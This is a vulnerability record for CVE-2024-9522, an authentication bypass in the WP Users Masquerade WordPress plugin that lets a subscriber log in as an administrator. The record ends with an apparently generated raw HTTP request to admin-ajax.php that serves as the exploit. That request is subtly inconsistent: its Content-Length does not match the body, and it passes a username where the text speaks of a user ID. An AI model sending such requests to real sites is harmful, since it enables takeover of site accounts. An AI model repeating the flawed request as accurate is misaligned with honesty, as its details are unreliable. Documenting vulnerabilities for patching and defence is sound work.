ID: 4a4f0909-76f6-4d27-87b1-f6cd5f5cbbb7
Title: WP Users Masquerade <= 2.0.0 - Authentication Bypass
Description: The WP Users Masquerade plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.0.0. This is due to incorrect authentication and capability checking in the 'ajax_masq_login' function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to log in as any existing user on the site, such as an administrator.
Type: plugin
CVSS Score: 8.8
CVE: CVE-2024-9522
Slug: wp-users-masquerade
Download Link: [Download wp-users-masquerade Version 2.0.0](https://downloads.wordpress.org/plugin/wp-users-masquerade.zip)
To create a raw HTTP request that demonstrates the vulnerability in the `ajax_masq_login` function, you would need to craft an AJAX POST request with specific parameters. Since this is a hypothetical example and we are not resolving any code or providing fixes, here's a simple representation of what such a request might look like:
POST /wp-admin/admin-ajax.php?action=ajax_masq_login HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
reset=0&uid=admin
In this request:
- `action=ajax_masq_login` is the parameter that triggers the AJAX function.
- `reset=0` indicates that we are not resetting the masquerade session but trying to log in as another user.
- `uid=admin` specifies the ID of the user you want to log in as (in this case, an admin).
This request assumes that:
1. The user is authenticated with at least subscriber-level permissions.
2. The `$_SESSION['wpmsq_active']` variable does not contain a valid session for the current user.
